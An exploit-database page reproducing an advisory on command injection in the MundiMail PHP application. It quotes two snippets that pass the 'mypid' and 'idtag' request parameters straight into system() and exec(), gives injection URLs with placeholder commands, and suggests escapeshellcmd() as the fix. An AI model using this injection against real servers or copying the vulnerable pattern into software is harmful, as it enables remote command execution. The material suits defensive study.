header-logo
Suggest Exploit
vendor:
MundiMail
by:
Ccat Research Labs
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: MundiMail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian, Centos & Windows Server 2000
2020

System() and Exec() Vulnerability in MundiMail

The MundiMail software is vulnerable to command injection due to the use of System() and Exec() without proper security practices. An attacker can exploit this vulnerability by sending a malicious command in the 'mypid' and 'idtag' parameters of the 'status/index.php' page. This will allow the attacker to execute arbitrary commands on the server.

Mitigation:

The vulnerability can be mitigated by using the escapeshellcmd() function to sanitize user input.
Source

Exploit-DB raw data:

# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

Code uses System() and Exec() without good practices in security.


1.- First Vulnerable Code

//need to kill daemon
		$cmd = "/bin/kill";
		$cmd .= " " . $_REQUEST["mypid"];
		system($cmd);

2.- Explotation

/admin/satus/index.php?mypid=command;


3.- Fixation


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
		$cmd .= ' ' . $_REQUEST["idtag"];
		$cmd .= ' > /dev/null';
		$cmd .= ' &';
		echo $cmd . "<br>\n";
		exec($cmd);
		$mid = "../mail/success.php";

5.- Explotation

/admin/status/index.php?idtag=command;


6.-fixation

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

We Can use other types of Fixation bug this is an easy one ;)


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------

Navigation

Suggest Exploit

Services By CQR